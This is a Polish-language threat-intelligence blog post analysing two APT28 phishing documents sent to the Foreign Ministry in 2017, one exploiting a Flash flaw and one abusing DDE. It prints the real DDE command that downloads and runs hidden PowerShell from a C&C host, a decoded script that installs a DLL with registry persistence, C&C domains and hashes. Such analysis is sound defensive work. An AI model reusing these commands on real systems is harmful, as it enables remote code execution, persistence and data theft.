piątek, 3 listopada 2017

Ataki teleinformatyczne na Ministerstwo Spraw Zagranicznych – jesień 2017W ciągu ostatnich tygodni dwukrotnie otrzymywaliśmy informacje od zespołu reagowania na incydenty komputerowe MSZ o nieudanych próbach uzyskania dostępu do stacji roboczych użytkowników. Pierwsza próba przeprowadzona została 18 października, kolejna 1 listopada. Obie zostały przeprowadzone przez grupę APT28 (Sofacy/Fancy Bear) o której już kilkakrotnie pisaliśmy na naszym blogu.

W obu przypadkach do wiadomości email dołączany był dokument w formacie MS WORD. Poniżej przykład:Według naszej wiedzy obie zostały skutecznie zablokowane. Porównując ostatnie próby z poprzednimi kampaniami można zauważyć zmiany w sposobie działania. Po pierwsze czas od pojawienia się poprawki na Adobe Flash a wykorzystania podatności został znacznie skrócony (2 dni). W ostatniej kampanii została użyta nowa metoda dostarczania złośliwego kodu (DDE) już bez użycia podatności ani makr. Zostały też zastosowane inne mechanizmy dodawania do autostartu. 

Pierwszy dokument (18 październik 2017):
Nazwa: World War III-ND.docx
SHA1: 7AADA8BCC0D1AB8FFB1F0FAE4757789C6F5546A3

Po uruchomieniu na ekranie pojawi się następująca treść:


Plik zawiera złośliwy kod wykorzystujący błąd we flash CVE-2017-11292. Opis tego pliku można znaleźć tutaj [1].


Drugi dokument (1 listopad 2017):
Nazwa: SaberGuardian2017.docx
SHA1: 64A8B9F327578DEF69EEA8DFAAD25400C2E644A2

Po uruchomieniu na ekranie pojawi się informacja o problemach z otwarciem pliku. Intruzi w tym ataku nie wykorzystali żadnej podatności ani makra a jedynie technikę polegającą na zastosowaniu protokołu DDE (Dynamic Data Exchange), który służy do wymiany danych pomiędzy aplikacjami w środowisko Windows.Gdy wybierzemy OK pojawi się kolejny komunikat informujący o możliwości odzyskania innej zawartości pliku.


Automatycznie pobierany jest kolejny plik w formacie MS WORD (o identycznej nazwie).  Poniżej zawartość pliku webSettings.xml.rels z pierwszego dokumentu.


Następnie pojawia się pytanie, czy chcemy uruchomić aplikację C:\Programs\Microsoft\Office\MSWord.exe. Drugi plik (pobrany dokument) zawiera komendę uruchamiającą skrypt PowerShell (plik źródłowy document.xml).


Uruchamiana komenda:

"C:\\Programs\\Microsoft\\Office\\MSWord.exe\\..\\..\\..\\..\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('http://sendmevideo.org/dh2025e/eee.txt');powershell -enc $e # " "a slow internet connection" "try again later"

Następnie pobierany jest z serwera zakodowany skrypt.

 
Na ekranie użytkownikowi zostanie wyświetlony następujący komunikat:


Zawartość skryptu po odkodowaniu:

$W=New-Object System.Net.WebClient;
$p=($Env:ALLUSERSPROFILE+"\mvdrt.dll");
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};
$W.DownloadFile("http://sendmevideo.org/dh2025e/eh.dll",$p);
if (Test-Path $p){
$rd_p=$Env:SYSTEMROOT+"\System32\rundll32.exe";
$p_a=$p+",#1";
$pr=Start-Process $rd_p -ArgumentList $p_a;
$p_bat=($Env:ALLUSERSPROFILE+"\mvdrt.bat");
$text='set inst_pck = "%ALLUSERSPROFILE%\mvdrt.dll"'+"`r`n"+'if NOT exist %inst_pck % (exit)'+"`r`n"+'start rundll32.exe %inst_pck %,#1'
[io.File]::WriteAllText($p_bat,$text)
New-Item -Path 'HKCU:\Environment' -Force | Out-Null;
New-ItemProperty -Path 'HKCU:\Environment' -Name 'UserInitMprLogonScript' -Value "$p_bat" -PropertyType String -Force | Out-Null;
}

Tym razem pobierana jest biblioteka DLL zawierająca złośliwe oprogramowanie, tworzony jest plik mvdrt.bat a następnie jest on uruchamiany. Tworzony jest również klucz rejestru UserInitMprLogonScript umożliwiający automatyczny start skryptu.

Zawartość pliku C:\ProgramData\mvdrt.bat:

set inst_pck = "%ALLUSERSPROFILE%\mvdrt.dll"
if NOT exist %inst_pck % (exit)
start rundll32.exe %inst_pck %,#1


Biblioteka DLL podobnie jak we wcześniejszych atakach ma na celu ułatwienie intruzom określenie wartości zaatakowanej stacji roboczej i sprawdzenie czy faktycznie uzyskał dostęp do stacji roboczej pracownika atakowanej instytucji a nie np. systemu sandbox.

W pierwszej kolejności zbierane i wysyłane są informacje o zainfekowanym komputerze. Są to następujące dane:
  • Informacje o uruchomionych procesach
  • Informacje o interfejsach sieciowych
  • Informacje o dyskach 
Poniżej fragment wysyłanych danych:


Dane przed wysłaniem są szyfrowane za pomocą klucza 0xE221FA96 a następnie kodowanie base64.
Większość nazw funkcji, bibliotek czy komend jest przechowywana w pliku DLL w formie zaszyfrowanej. Główna funkcja odkodowująca umieszczona jest poniżej:

.text:100030F5
.text:100030F5 loc_100030F5: ; CODE XREF: sub_100030D1+47
.text:100030F5 lea ecx, [eax+esi]
.text:100030F8 mov [ebp+var_4], 0Eh
.text:100030FF xor edx, edx
.text:10003101 div [ebp+var_4]
.text:10003104 mov al, ds:byte_100071B4[edx]
.text:1000310A xor al, [edi+ecx]
.text:1000310D mov [ecx], al
.text:1000310F mov eax, [ebp+arg_4]
.text:10003112 inc eax
.text:10003113 mov [ebp+arg_4], eax
.text:10003116 cmp eax, ebx
.text:10003118 jl short loc_100030F5
.text:1000311A pop edi
.text:1000311B


Do serwera C&C przesyłane są również zrzuty z ekranu (jako zaszyfrowane jpeg).

Nazwy serwerów C&C powiązanych z atakiem:
satellitedeluxpanorama.com
sendmevideo.org
blackpartshare.com

Funkcje skrótu analizowanych plików:
Nazwa: World War III-ND.docx
SHA1: 7AADA8BCC0D1AB8FFB1F0FAE4757789C6F5546A3
Nazwa: SaberGuardian2017.docx
SHA1: 64A8B9F327578DEF69EEA8DFAAD25400C2E644A2
MD5 (1 plik):  c6ef573abdec611645a23e48fe83158b
MD5 (2 plik): 34dc9a69f33ba93e631cd5048d9f2624
Nazwa: eh.dll
SHA1: AB354807E687993FBEB1B325EB6E4AB38D428A1E
MD5: 1c6f8eba504f2f429abf362626545c79
Nazwa: activeX1.bin
SHA1: 8C0E8619ED6DFB9E6F6F3B06A0CA19E276E3BC75

Źródło:
[1]
https://www.proofpoint.com/us/threat-insight/post/apt28-racing-exploit-cve-2017-11292-flash-vulnerability-patches-are-deployedBrak komentarzy:

Prześlij komentarz